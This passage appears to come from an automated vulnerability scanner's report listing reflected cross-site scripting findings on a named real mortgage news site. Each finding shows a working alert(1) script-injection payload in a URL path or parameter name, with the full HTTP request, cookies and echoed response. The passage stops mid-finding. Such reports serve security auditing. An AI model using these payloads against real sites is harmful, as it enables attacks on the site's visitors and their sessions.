GET /200783bb0"><script>alert(1)</script>5b51746308e/12/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200783bb0\"><script>alert(1)</script>5b51746308e/12/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7553a"><script>alert(1)</script>4b6519fec9b was submitted in the REST URL parameter 2. This input was echoed as 7553a\"><script>alert(1)</script>4b6519fec9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/127553a"><script>alert(1)</script>4b6519fec9b/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/127553a\"><script>alert(1)</script>4b6519fec9b/feed/" /> ...[SNIP]...
1.242. http://mortgage.ocregister.com/2007/12/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2007/12/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db24"><script>alert(1)</script>33a184a2162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4db24\"><script>alert(1)</script>33a184a2162 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2007/12/?4db24"><script>alert(1)</script>33a184a2162=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2007 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2007/12/?4db24\"><script>alert(1)</script>33a184a2162=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d30"><script>alert(1)</script>9a1798c9a18 was submitted in the REST URL parameter 1. This input was echoed as 47d30\"><script>alert(1)</script>9a1798c9a18 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200847d30"><script>alert(1)</script>9a1798c9a18/01/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200847d30\"><script>alert(1)</script>9a1798c9a18/01/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de23d"><script>alert(1)</script>2d509002565 was submitted in the REST URL parameter 2. This input was echoed as de23d\"><script>alert(1)</script>2d509002565 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01de23d"><script>alert(1)</script>2d509002565/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:43 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01de23d\"><script>alert(1)</script>2d509002565/feed/" /> ...[SNIP]...
1.245. http://mortgage.ocregister.com/2008/01/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/01/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fd34"><script>alert(1)</script>6eeaa914028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1fd34\"><script>alert(1)</script>6eeaa914028 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/01/?1fd34"><script>alert(1)</script>6eeaa914028=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:30 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/01/?1fd34\"><script>alert(1)</script>6eeaa914028=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3080f"><script>alert(1)</script>0eba11e28c7 was submitted in the REST URL parameter 1. This input was echoed as 3080f\"><script>alert(1)</script>0eba11e28c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083080f"><script>alert(1)</script>0eba11e28c7/02/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:31 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:31 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083080f\"><script>alert(1)</script>0eba11e28c7/02/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2dc"><script>alert(1)</script>3615908630 was submitted in the REST URL parameter 2. This input was echoed as be2dc\"><script>alert(1)</script>3615908630 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/02be2dc"><script>alert(1)</script>3615908630/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02be2dc\"><script>alert(1)</script>3615908630/feed/" /> ...[SNIP]...
1.248. http://mortgage.ocregister.com/2008/02/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/02/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44db"><script>alert(1)</script>debe3db6973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44db\"><script>alert(1)</script>debe3db6973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/02/?c44db"><script>alert(1)</script>debe3db6973=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:28 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 89848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/02/?c44db\"><script>alert(1)</script>debe3db6973=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfaad"><script>alert(1)</script>feb9e55050e was submitted in the REST URL parameter 1. This input was echoed as cfaad\"><script>alert(1)</script>feb9e55050e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008cfaad"><script>alert(1)</script>feb9e55050e/03/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:46 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cfaad\"><script>alert(1)</script>feb9e55050e/03/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58700"><script>alert(1)</script>3e5461fd9e3 was submitted in the REST URL parameter 2. This input was echoed as 58700\"><script>alert(1)</script>3e5461fd9e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/0358700"><script>alert(1)</script>3e5461fd9e3/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:51 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:52 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0358700\"><script>alert(1)</script>3e5461fd9e3/feed/" /> ...[SNIP]...
1.251. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9aad'><script>alert(1)</script>c7ff9075973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9aad\\\'><script>alert(1)</script>c7ff9075973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/03/?c9aad'><script>alert(1)</script>c7ff9075973=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92937
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/03/?c9aad\\\'><script>alert(1)</script>c7ff9075973=1&dem_add_user_answer=true&dem_poll_id=23' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
1.252. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf812"><script>alert(1)</script>a5833fbe6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf812\"><script>alert(1)</script>a5833fbe6d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/03/?bf812"><script>alert(1)</script>a5833fbe6d8=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:14:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/03/?bf812\"><script>alert(1)</script>a5833fbe6d8=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b2c"><script>alert(1)</script>fd2de0df0b8 was submitted in the REST URL parameter 1. This input was echoed as 88b2c\"><script>alert(1)</script>fd2de0df0b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200888b2c"><script>alert(1)</script>fd2de0df0b8/04/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200888b2c\"><script>alert(1)</script>fd2de0df0b8/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df03a"><script>alert(1)</script>12872902b15 was submitted in the REST URL parameter 2. This input was echoed as df03a\"><script>alert(1)</script>12872902b15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/04df03a"><script>alert(1)</script>12872902b15/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:14:42 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04df03a\"><script>alert(1)</script>12872902b15/feed/" /> ...[SNIP]...
1.255. http://mortgage.ocregister.com/2008/04/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2008/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f116"><script>alert(1)</script>31b6d1dd7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f116\"><script>alert(1)</script>31b6d1dd7c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
